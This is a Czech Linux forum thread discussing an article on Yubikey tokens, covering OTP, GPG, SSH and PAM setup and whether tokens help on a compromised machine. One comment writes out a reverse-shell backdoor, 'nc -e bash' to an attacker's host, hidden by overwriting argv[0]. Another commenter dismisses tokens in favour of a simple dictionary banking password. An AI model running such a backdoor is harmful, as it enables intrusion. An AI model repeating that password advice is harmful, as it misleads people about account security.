Yubikey. Co to je a co to umí (1) (diskuse)

AbcLinuxu:/ Články / Yubikey. Co to je a co to umí (1) / Yubikey. Co to je a co to umí (1) (diskuse)

Štítky: není přiřazen žádný štítek

Nástroje: Začni sledovat (3) ?

29.4.2016 17:20 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Odpovědět | Sbalit | Link | Blokovat | Admin

Ten obrázek s klíčenkou je špatně vložený, má tam být na konci keys.jpg a je tam kyes.jpg.

http://www.abclinuxu.cz/images/clanky/bystroushaak/29.4.2016/kyes.jpg

blog.rfox.eu | Lessons learned from games

29.4.2016 18:42 pavele
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Jen pár poznámek:


- "Rozběhat" OpenPGP + Yubiko není až tak jednoduché, postup se liší podle druhu linuxové distribuce. 

- Emulace klávesnice - při nastavení Yubikey, aby generoval při stisku tlačítka mnou uložené heslo, závisí výstup na rozložení klávesnice (například en, cs a další)

- OTP ověřování probíhá přes Yubiko server = třetí stranu.

- OpenPGP + Yubiko má v některých distribucích linuxu problém s Gnome klíčenkou.

- V některých distribucích linuxu je potřeba přidat soubor do udev, jinak je Yubiko detekován pouze pod uživatelem root.

- Pro použití ve Windows pro přihlašování přes Yubiko -> OpenPGP -> OpenSSH je potřeba pouze OpenSSH klient (například PuTTY) a paegant upravený pro OpenPGP.
Takže můžu přijít k jakémukoliv PC s Windows a pro přihlášení přes OpenSSH mi stačí dvě binárky, které mám na flešce nebo na netu, a Yubiko klíč.

29.4.2016 18:44 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Emulace klávesnice - při nastavení Yubikey, aby generoval při stisku tlačítka mnou uložené heslo, závisí výstup na rozložení klávesnice (například en, cs a další)

Tohle mě štvalo tak, až jsem systému řekl, aby přijímal obě varianty hesla (s numlockem a bez něj). I u bezpečného kryptografického ověřování by šlo prostě těch pár možností zkusit.

29.4.2016 18:49 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

- V některých distribucích linuxu je potřeba přidat soubor do udev, jinak je Yubiko detekován pouze pod uživatelem root.

Imho ve všech. Řešeno je to v dalším díle (nevím přesně tedy v kterém a kolik jich ještě bude, původně to byl 40kB dlouhý článek, který redakce rozkrájela na víc menších podle jejich uvážení).

blog.rfox.eu | Lessons learned from games

29.4.2016 19:07 pavele
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Uvítal bych v některém díle něco o HSM.

29.4.2016 20:06 R
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

V Linuxe sa da priradit konkretnej klavesnici rozlozenie klaves, takze by stacilo nastavit Yubikey na "us".

29.4.2016 18:06 Sid
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Odpovědět | Sbalit | Link | Blokovat | Admin

Tento serial prichadza v pravy cas :-)

, zrovna som si tiez jeden kupil tak si usetrim cas straveny hladanim.

29.4.2016 18:40 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Odpovědět | Sbalit | Link | Blokovat | Admin

Jo, to je dobrý nápad, dávat fotky klíčů na internet…

Podle mě to jenom zvyšuje náročnost provedení útoku -- u OTP místo ukradení hesla ukradnu cookie a se vzdálenou aplikací se pobavím s ní. U podepisování kvůli absenci displeje nevidím, co vlastně podepisuju…

Dále se trošku bojím toho mít klíč na takovém docela uzavřeném a neauditovatelném zařízení - konkrétně bych čekal nedostatečný RNG nebo rovnou backdoor.

Zde ovšem narážíme na problém dnešních mobilních operačních systémů, které jsou stejně děravé, jako ty desktopové.

A také na mobilní sítě, které jsou děravé…

29.4.2016 18:42 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Jo, to je dobrý nápad, dávat fotky klíčů na internet…

Tak už mi napsal, že jsou shopped.

29.4.2016 18:55 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Jo, to je dobrý nápad, dávat fotky klíčů na internet…

Klíče jsou skutečně upravené v gimpu kopírovacím nástrojem. Z těch stínů je to trochu vidět, hlavně u „červeného“.

Dále se trošku bojím toho mít klíč na takovém docela uzavřeném a neauditovatelném zařízení - konkrétně bych čekal nedostatečný RNG nebo rovnou backdoor.

Yubikey afaik nějakým auditem prošel. Úplně věřit se mu ale asi nedá, ale o tom už jsme měli jeden rozhovor na IRC (pod mikroskopem zkoumatelné FPGA).

blog.rfox.eu | Lessons learned from games

29.4.2016 21:48 crazynomad
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

U hardwaru audit nepomuze. Kazdy kus se muze lisit a tezko se to zjistuje. Jednou nam do firmy prisla varka procesoru, u ktere se po delsi dobe zjistilo, ze jiste delsi posloupnosti instrukci specificky poskozuji pamet. Nepovedlo se prokazat snahu o sabotaz nebo napadeni. Obrana je tezka, kdyz se k nam prokazatelne chteli dostat i tajne sluzby. Bez ohledu na predchozi, pro bezne lidi to muze fungovat jako levne vylepseni bezpecnosti a v tom Yubicu fandim.

1.5.2016 15:24 Ovocníček
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Můžu se zeptat co jste za firmu?

3.5.2016 09:57 crazynomad
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Suse

5.5.2016 17:36 koroptev
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Suse to je skoro zbrojovka

29.4.2016 20:52 karelI
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Odpovědět | Sbalit | Link | Blokovat | Admin

Možná mi něco uniká, ale není mi jasné, jak takový token může cokoli garantovat, pokud předpokládáme, že samotný počítač je pod kontrolou útočníka. V tu chvíli je totiž i můj systém MITM a jediné co ovládám já je ten token.

29.4.2016 21:12 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Afaik ani tvůrci ani já jsme nikde nepsali, že ti může cokoliv garantovat. Je to pouze spolehlivější metoda dvoufaktorové autentizace.

blog.rfox.eu | Lessons learned from games

29.4.2016 21:49 karelI
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

V tom případě jsem asi nepochopil odstavec "K čemu?". Jestliže si útočník s mým mobilem a kompem může dělat co chce, tak první co udělá je, že tuto ochranu odpojí. Pouze mu stačí, aby mě udržoval v iluzi, že je to stále chráněné. Čili ve skutečnosti to nepřidává ke spolehlivosti vůbec nic, jen to uživateli komplikuje život (a v té iluzi nějaké vyšší bezpečnosti ho to udržuje vlastně už od počátku).

29.4.2016 21:58 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Jo, to jsi fakt nepochopil.

Pokud ochranu odpojí, tak je mu to k ničemu. Tohle není ochrana počítače, to je ochrana tvých účtů a hesel. Ochrana nespočívá v software, ale právě v tom hardware, který vyžaduje fyzicky rukou zmáčknout hardwarové tlačítko na tom tokenu. Hesla však nikdy neopouštějí token, maximálně co útočník může je zachytit jeden OTP string, což potom řeší práve GPG v režimu smartcardy, kdy nezachytí nic, protože klíč nikdy neopouští token.

blog.rfox.eu | Lessons learned from games

29.4.2016 22:48 karelI
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Jenže tohle všechno předpokládá, že ty účty jsou na ten token nějak napojeny. První co útočník udělá je, že tuto vazbu zruší a je po všem. K tomu bude potřebovat, abys mu ten token parkrát zmáčknul, ale to není problém, když má vše pod kontrolou. Takže ten token je k ničemu, když máš hacknutý systém a tedy ani nevíš, co vlastně podepisuješ. Když nad tim tak přemýšlím, vlastně ani není potřeba rušit tu vazbu. To že nevíš co podepisuješ úplně stačí, jen je to trochu pomalejší.

30.4.2016 11:08 Filip Jirsák
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Mohl byste rozvinout, jak si ten útok představujete? Dejme tomu, že OTP hesla používám k přihlášení ke vzdálenému serveru přes SSH. Pokud se budu přihlašovat jenom heslem, stačí útočníkovi odposlechnout heslo a může se přihlásit mým jménem, kdy ho napadne. Pokud budu používat přihlášení klíčem uloženým na disku, stačí útočníkovi získat klíč a heslo k němu, a opět se může přihlásit, kdy ho napadne. Útočník, který má plně v moci můj počítač, obojí zvládne. Ale jak si představujete útok na ten token? Útočník, který má plně v moci můj počítač, samozřejmě kdykoli může převzít navázané spojení, to je ale princip toho, že má v moci počítač, a není před tím vůbec žádná obrana.

30.4.2016 11:33 karelI
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Vlastně jste to popsal. Útočník převezme spojení, na server si hodí svůj privátní klíč (nebo cokoli co ho tam pustí) a token je ze hry. Obávám se, že pro něj bylo snažší token obejít než pro vás ho nastavit. A vy nadále žijete v blaženém pocitu, že musíte zmáčknout tlačítko :-)

Prostě článek měl mít motivaci spíš takovou - jsme paranoidní, máme napadený mobil i komp, takže útočník si může dělat co chce. Tak to hodíme za hlavu a budem se zabývat hračkou, která s tím vůbec nesouvisí, komplikuje nám postupy, ale vypadá to strašně cool :-)

30.4.2016 11:55 pavele
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Mohl bys popsat převzetí navázaného spojení u OpenSSH s klíči? Pokud vím, v okamžiku zasahování do komunikace SSH dojde automaticky k ukončení spojení.

Spíše mi připadá, že se snažíte, aby tyto technologie nikdo nepoužíval. Díky, pro mne to znamená, že fungují.

30.4.2016 14:04 karelI
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Opravdu chceš, abych ti vysvětloval, jak převzít spojení u systému, který mám pod kontrolou? Tedy včetně všech binárek atd.

Pouze zkouším, jestli ta motivace z článku je platná. Bohužel až příliš často se setkávám s tím, že se někdo snaží bezpečnost zvýšit způsobem, který pouze komplikuje použití, ale nezlepšuje nic. Jeden z osvědčených kritických postupů je se prostě snažit se být tím útočníkem a najít v úvaze chybu.

Druhá část tvého příspěvku je s prominutím neuvěřitelný mentální veletoč. Opravdu to bereš tak, že snaha o nalezení chyby v systému je pro tebe důkazem, že systém je bez chyby? Co na to říct...

2.5.2016 08:29 Xerces
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Nj. Bohužel se to neděje jenom v oblasti IT, ale i v jiných oblastech, například zabezpečení dopravy. Kde se vyšší bezpečnosti snaží docílit přidáváním dalších a dalších prvků, které sami o sobě třeba fungují perfektně, ale v širším kontextu jsou spíše kontraproduktivní. :-/

30.4.2016 15:20 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Vlastně jste to popsal. Útočník převezme spojení, na server si hodí svůj privátní klíč (nebo cokoli co ho tam pustí) a token je ze hry. Obávám se, že pro něj bylo snažší token obejít než pro vás ho nastavit. A vy nadále žijete v blaženém pocitu, že musíte zmáčknout tlačítko

Token je ze hry pro jeden server. Útočník tím nezíská přístupy do banky, k šifrovaným gpg souborům, ke githubu a dalším webům a já můžu začít řešit kompromitaci. Jak jsem psal, není to dokonalé řešení, jen lepší dvoufaktorová autentizace. Nebo ta ti přijde taky úplně zbytečná?

blog.rfox.eu | Lessons learned from games

30.4.2016 16:19 Filip Jirsák
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

To ovšem předpokládáte, že já jako uživatel mám možnost na vzdáleném serveru tu OTP autentizaci vypnout, navíc nepozorovaně. Neřekl bych, že OTP s bezpečností nijak nesouvisí, nebo že je to komplikované. Nedovedu si představit, že bych se třeba do elektronického bankovnictví přihlašoval pevným heslem.

1.5.2016 09:59 Cobolak
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

To "vypnutie" nemusi byt uplne odstranenie. Staci na vzdialenom stroji spustit backdoor ako nc -e bash utocnikov.stroj. Pri prepisani argv[0] si toho vsimne malokto. Na poslanie prikazu mi stacia vlastnosti X, netreba sa ani hrabat v zdrojakoch ssh.

1.5.2016 11:41 Filip Jirsák
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

V případě přihlašování přes SSH k obyčejnému serveru je to možné. V případě přihlašování k webmailu nebo internetovému bankovnictví je „staci na vzdialenom stroji spustit backdoor“ mimo realitu.

8.5.2016 01:15 petrfm | skóre: 23
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Tak stačí převzít mým suprtrupr tokenem autentifikované a navázané spojení a odeslat peníze, ne? Co dalšího bych měl s tím bankovnictvím chtít dělat? Takže x let nošení, hledání a mačkání nějaké cypoviny a ve finále zase prázdný účet. Stejně jako Maruna, která neumí napsat SMSku a v IB měla heslo hovnokleslo. Dvoufaktorová autorizace prostřednictvím mobilu je IMHO více jak 120% řešení. Zbytek jsou vyhozené peníze a další opruz, co musím sebou nosit, když stejně většinu průniků do IB mají debilové, co vyplňují dotazníky přijaté emailem a píšou do nich i svůj PIN.

fuck the cola, fuck the pizza, all you need is slivovitza

8.5.2016 13:33 hz
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

A ja myslel, ze 100 % je maximum ;)

8.5.2016 15:05 pavlix | skóre: 54 | blog: pavlix
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

To bych mu neříkal. Takhle je aspoň na první pohled jasné, že ho má člověk ignorovat.

Já už tu vlastně ani nejsem. Abclinuxu umřelo.

9.5.2016 02:25 kyknos | skóre: 18 | blog: Quid novi? | Ranša Rosa
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

cože?

už jsem slyšel, že je ph=0 minimum, 80 °F dvakrát teplejší než 40 °F, a že kytkám měří papání v luxech, ale že by 100% bylo maximum, to jsem ještě neslyšel

So the Nationalists and the Socialists have the same policy on Brexit. They should get together and form a...

9.5.2016 19:55 hz
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Nepsal jsem, ze 100% je maximum, ale ze 100 % je maximum.

9.5.2016 21:09 kyknos | skóre: 18 | blog: Quid novi? | Ranša Rosa
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Obojí je stejný nesmysl.

So the Nationalists and the Socialists have the same policy on Brexit. They should get together and form a...

9.5.2016 23:17 k3dAR | skóre: 63
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

tak % je zlomek ze 100, ale jasne, vetsi polovina z nas to porad nechape :)

porad nemam telo, ale uz mam hlavu... nobody

10.5.2016 01:58 kyknos | skóre: 18 | blog: Quid novi? | Ranša Rosa
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

a 200/100 není zlomek? jedno jablko je maximum? ta maturita z matiky je potreba jako sul, koukam

So the Nationalists and the Socialists have the same policy on Brexit. They should get together and form a...

10.5.2016 11:58 k3dAR | skóre: 63
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

proc by 200/100 nebyl zlomek? ti hrabe? je to zlomek ze 100, jak sem psal :) jablko ne, maximum je jeden kyknos, bejt tu dva tak uz to tu cele zkolabuje, maturitu z matiky sem mel za 1, diky za optani, ovsem ty jsi asi z psychologie delal reparat ;)

porad nemam telo, ale uz mam hlavu... nobody

11.5.2016 13:12 kyknos | skóre: 18 | blog: Quid novi? | Ranša Rosa
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

pokud někdo tvrdi, ze 100% nebo 100 % je maximum, tak asi nechape, ze 200/100 je zlomek

z psychologie mam 1 i ze statnic :)

So the Nationalists and the Socialists have the same policy on Brexit. They should get together and form a...

11.5.2016 15:32 petrfm | skóre: 23
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Jestli jsi nikdy nesplnil plán na 120 %, tak jsi houby a né soudruh.

fuck the cola, fuck the pizza, all you need is slivovitza

12.5.2016 00:00 hz
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Inu dobra, rozepiseme si to. Reakce byla na 120% reseni. Reseni chapu tak, ze kdyz je vyreseno, je to tech 100 procent. Nedava mi tedy smysl mit vic.

A to ze nejsem soudruh, to je naprosto v poradku a jsem za to rad ;-)

Jo a pardon, ze jsem krmil ten trolici komentar a svinil tak diskuzi.

13.5.2016 00:34 petrfm | skóre: 23
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Jseš tak blbej, nebo si na to jenom hraješ? Úkol/problém - vydělat na brigádě tisíc korun. Řešení - vydělám 1200 korun. Splnil jsem plán? Na 120%

ty budeš z těch, co nechápou, proč 1+1 = 1, že?

fuck the cola, fuck the pizza, all you need is slivovitza

16.5.2016 09:53 prcamo
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

asi nejakej menezer

10.5.2016 09:37 Filip Jirsák
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Mám účet pouze u takových bank, kterým k odeslání peněz nestačí, že jsem přihlášen na svůj účet, ale požadují autorizaci každé platby.

8.5.2016 01:10 petrfm | skóre: 23
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Nedovedu si představit, že bych se třeba do elektronického bankovnictví přihlašoval pevným heslem.

A proč? Mám to tak asi 10 let. 10 let stejné heslo (naprosto jednoduché, slovníkové). Nezmizela mi ani koruna. Na paranoiu pomáhají prášky, ne tokeny :-)

fuck the cola, fuck the pizza, all you need is slivovitza

8.5.2016 15:06 pavlix | skóre: 54 | blog: pavlix
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Obávám se, že bezpečnost nezávisí na tom, zda se vám ztratila koruna.

Já už tu vlastně ani nejsem. Abclinuxu umřelo.

10.5.2016 09:40 Filip Jirsák
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

To, že vám nezmizela ani koruna, neznamená, že je to bezpečné.

11.5.2016 15:29 petrfm | skóre: 23
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

To prakticky dokazuje, že to bezpečné je. Naopak, to, že si myslím, že je to bezpečné neznamená, že mi někdo nevybere účet. Pokud bych si měl vybrat, raději bych zvolil nezabezpečený účet, na kterém peníze zůstanou :-)

Ale to je možná tím, že mám raději praxi, než rozjímání nad kouskem hovna.

fuck the cola, fuck the pizza, all you need is slivovitza

11.5.2016 22:03 pavlix | skóre: 54 | blog: pavlix
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Ale to je možná tím, že mám raději praxi, než rozjímání nad kouskem hovna.

Tak proč mám z toho, co píšeš přesně opačný dojem?

Já už tu vlastně ani nejsem. Abclinuxu umřelo.

13.5.2016 00:38 petrfm | skóre: 23
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Protože rád rozjímáš a slovíčkaříš... :-)

Nad čím si doplň sám... :-)

Celá tahle diskuze je o bezpečnosti, která neexistuje, takže je vlastně o ... Bezpečné je jenom to, že všichni umřeme.

fuck the cola, fuck the pizza, all you need is slivovitza

30.4.2016 11:15 Raketa
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Přesně tak. Je dobré nežít v iluzi nějaké super bezpečnosti díky tomu, že mám nějaký artefakt, který mě omezuje. Token musí mít vlastní display a klávesnici, aby bylo jasné co dělá a co dělám já. Je nesmysl řešit u yubikey scan pod el. mikroskopem, když je tu mnohem jednoduší vektor a bez fyz. přístupu.

30.4.2016 15:17 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Ehm, co by měl dělat, když je to jednoúčelové zařízení, které prostě nic jiného neumí? Jak by ti v tomhle pomohl displej a klávesnice. Navíc yubikey v podstatě displej a klávesnici má - je tam jedna ledka, která začne blikat když chce GPG heslo a jedno tlačítko fungující ve dvou režimech (krátký a dlouhý dotek).

blog.rfox.eu | Lessons learned from games

8.5.2016 11:46 Zopper | skóre: 15
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Problém je třeba v elektronickém bankovnictví, když mi malware pod rukama změní informace o platbě, co právě posílám. V takový okamžik čekám, že budu generovat OTP, ale zatímco na mobilu mi v sms přijde číslo cílového účtu a částka, a já si můžu ověřit, že mezi klávesnicí a bankou nedošlo ke změně, u Yubikey podepisuju prázdný papír a jen doufám, že mi útočník nepodstrčil k podpisu něco jiného.

Mobil má zase riziko toho, že bude taky napadnutý... (Ale můžeme si být jisti, že neexistuje nějaký vektor na Yubikey?) Člověk si nevybere, no.

"Dlouho ještě chcete soudit proti právu, stranit svévolníkům?" Ž 82,2

8.5.2016 14:09 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Já bych to viděl jako doplněk, ne jako úplnou náhradu a kompletní řešení. To by se asi dalo jen jak jsem psal, kdyby měl člověk přímo v mozku podporu asymetrického šifrování.

blog.rfox.eu | Lessons learned from games

29.4.2016 21:58 veveričkaplešatá
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

keby ste sa rozpisali radsej o tom ako sa prihlasit cez ten kluc do pocitaca tak ako aj root a ako aj user , ako to nakonfigurovat a podobne vsade sa pisu len same omacky ale to podstatne je vzdy vynechane ... bol by som povdacny ako to potom bude prihlasovat a podobne , ako si to generuje heslo ktore pouzije nabuduce a tak ako sa vlasne pomocou toho klucu prihlasim do PC to mna zaujma a nie nejake google a podobne cloud sluzby ... zial je to tak . Dakujem .

29.4.2016 22:03 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Jak jsem psal dál, budou ještě další díly (rozkouskovala to redakce, ne já). V nich se řeší použití s GPG (jak ho kompletně rozchodit, vygenerovat klíče, nastavit PINy a tak) a použití pro SSH (privátní klíč je pak v tokenu). Neřeším tam přihlášení do počítače, ale to je v podstatě stejné, jako to SSH, jen to chce říct linuxu (PAM modul) aby se přes GPG spojil s tím tokenem. Není vyloučeno, že o tom já, nebo někdo jiný potom ještě napíše další info, ale zatím jsem neměl potřebu to nastavovat.

blog.rfox.eu | Lessons learned from games

30.4.2016 09:55 pavele
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Stačí se podívat do sekce Hardware -> Příslušenství -> Podle sběrnice -> USB -> Kryptografická zařízení -> YubiKey NEO. Tam jsem popsal, jak jsem si token nastavoval já. Zbytek máš zde nebo zde.

30.4.2016 15:31 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

YubiKey NEO.

Dobré. Ten další díl článku bude podobný.

blog.rfox.eu | Lessons learned from games

29.4.2016 23:35 limit_false | skóre: 23 | blog: limit_false
Rozbalit Rozbalit vše scdaemon

Odpovědět | Sbalit | Link | Blokovat | Admin

Běží ti proces scdaemon? Nebo víš, jaký proces obstarává komunikaci s Yubikey? Já jsem u gpg2 zjistil, že na CentOS 7 se stěžuje gpg2 --card-status hláškou "OpenPGP card not available: No SmartCard daemon". Na Ubuntu 16.04 to samé, ale funguje GPG 1.x gpg --card-status.

Už Yubikey dlouho používám, ale tohle mně trocha zaskočilo. Neměl jsem ještě čas debugovat, v čem je plně přesně problém.

BTW někdo se tady ptal o přihlášení na počítač - já Yubikey používám někde na su/sudo přes PAM u některých strojů. Podobně by to šlo na login. Do /etc/pam.d/ souboru se přidá něco jako:


auth            sufficient      pam_yubico.so id=... authfile=... url=...

Viz pam_yubico.

When people want prime order group, give them prime order group.

30.4.2016 15:29 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
Rozbalit Rozbalit vše Re: scdaemon

Běží ti proces scdaemon?

Neběží.

Nebo víš, jaký proces obstarává komunikaci s Yubikey?

gpg-agent --daemon --enable-ssh-support. O tom budou další detaily v příštích dílech a u tohohle dílu na konci.

blog.rfox.eu | Lessons learned from games

30.4.2016 18:32 limit_false | skóre: 23 | blog: limit_false
Rozbalit Rozbalit vše Re: scdaemon

Záhada vyřešena, gpg2 skutečně potřebuje scdaemon k fungování. V Ubuntu je v balíku scdaemon, pro CentOS se skrývá v gnupg2-smime.

When people want prime order group, give them prime order group.

30.4.2016 19:23 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
Rozbalit Rozbalit vše Re: scdaemon

Balík možná, ale jako proces to opravdu běžet nevidím.

blog.rfox.eu | Lessons learned from games

30.4.2016 19:41 limit_false | skóre: 23 | blog: limit_false
Rozbalit Rozbalit vše Re: scdaemon

Mně ho gpg2 vždy spustí při --card-status nebo nějaké práci s PGP appletem na yubikey (gpg2 2.1.11).

Ještě si vzpomínám, že scdaemon tu kartu drží jako "otevřenou", tj. nedostane se k ní jiný proces (např. pokud se používa SSH s PIV appletem přes OpenSC PKCS#11). Stačí toho scdaemona killnout, ale je to trocha usability bug.

When people want prime order group, give them prime order group.

30.4.2016 19:49 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
Rozbalit Rozbalit vše Re: scdaemon

Aha. Jestli ho pustí vždycky jen na chvíli, tak to je pak možné, zas tak detailně jsem to nezkoumal.

blog.rfox.eu | Lessons learned from games

30.4.2016 20:46 pavele
Rozbalit Rozbalit vše Re: scdaemon

Jako alternativu k Yubikey doporučuji token K30 s kartou Open PGP SmartCard V2.1 ID-000 (pro GPG). Funguje "out of box", testováno na Debian Sqeeze, Jessie, CentOS 6/7. :-)

30.4.2016 21:46 limit_false | skóre: 23 | blog: limit_false
Rozbalit Rozbalit vše Re: scdaemon

Pokud myslíš tohle, tak to mám (ten dolní). Používal jsem to hlavně jako čtečku na SIM karty.

Kde jsi koupil tu OpenPGP kartu? Před časem všechny obchody, co to prodávali, byli vyprodané. Možná zas nějaký ožil? Vypadá, že kernelconcepts.de je má zas na skladě.

When people want prime order group, give them prime order group.

30.4.2016 14:39 Kolar
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Odpovědět | Sbalit | Link | Blokovat | Admin

Diky za pekny clanek! Jiz drive jsem uvazoval o porizeni si, ted jste mi to zase pripomnel.

Par dotazu:

1) Ramcove, o cem budou dalsi dily?

2) Alternativy k Yubikey? Ev. ktere verze si poridit..?

3) Recovery? Situace, kdy mam s Yubikey sparovany dm-crypt pri bootu, GPG klice...a ztratim klicenku.

Diky moc,

30.4.2016 15:14 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

1) Ramcove, o cem budou dalsi dily?

Už jsem to tu psal:

budou ještě další díly (rozkouskovala to redakce, ne já). V nich se řeší použití s GPG (jak ho kompletně rozchodit, vygenerovat klíče, nastavit PINy a tak) a použití pro SSH (privátní klíč je pak v tokenu)

2) Alternativy k Yubikey? Ev. ktere verze si poridit..?

Bývalý kolega, který je teď v redhatu používá něco s displejem. Ukazoval mi to, ale bohužel žádné detaily nevím, ale třeba bude vědět někdo jiný z diskuze.

3) Recovery? Situace, kdy mam s Yubikey sparovany dm-crypt pri bootu, GPG klice...a ztratim klicenku.

Kopii privátního GPG klíče si můžeš po vygenerování uložit někam vedle (=veracrypt oddíl), nebo offline.

blog.rfox.eu | Lessons learned from games

30.4.2016 20:56 alkoholik | skóre: 40 | blog: Alkoholik
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Odpovědět | Sbalit | Link | Blokovat | Admin

Byl to jenom muj pocit nebo PKI a PGP applety na Yubikey 4 nesdili PIN a PUK a je potreba je zmenit v obou?

3.5.2016 10:08 pavlix | skóre: 54 | blog: pavlix
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Odpovědět | Sbalit | Link | Blokovat | Admin

Nevidím nikde zmínku o LinOTP.

Já už tu vlastně ani nejsem. Abclinuxu umřelo.

3.5.2016 17:22 Jenyk
Rozbalit Rozbalit vše Placebo na děsivé myšlenky?

Odpovědět | Sbalit | Link | Blokovat | Admin

Děsivá myšlenka z hlediska soukromí, ještě děsivější z hlediska moci, kterou to potenciálnímu útočníkovi dává. Jak jednou odposlechne moje hesla, má přístup všude, kde mám přístup já. Nejhorší na tom je, že se o tom ani nedozvím, protože vše vypadá naprosto legitimně, dokud mi nezačnou mizet peníze z účtu.

Děsivá myšlenka to je, o tom žádná. Ale jak to pomůže zabránit mizení peněz z mého účtu, to tedy nevím.

5.5.2016 16:56 :)
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Odpovědět | Sbalit | Link | Blokovat | Admin

pouzijte knocking :-)

system vygeneruje pri prihlaseni sekvenciu 3s4k2u5n2p 3x zapnut svetlo v miestnosti /webkamera/, 4x stlacenie klaves, 2x pripojit usb kluc, 5x odpojit kabel od sietovky, 2x ist na pivo :-)

po zadani hesla vas naloguje :-)

5.5.2016 22:57 petrfm | skóre: 23
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Odpovědět | Sbalit | Link | Blokovat | Admin

Jak to bylo v těch pelíškách? Teda, to muselo dát hrozný práce... přitom taková blbost :-D

Hračky navozující pocit kybernetické bezpečnosti dneska ještě někdo kupuje? Hoši, ušetřete tisícovku a zajděte si radši na pivo a za holkama :-)

)

fuck the cola, fuck the pizza, all you need is slivovitza

5.5.2016 23:52 pavlix | skóre: 54 | blog: pavlix
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

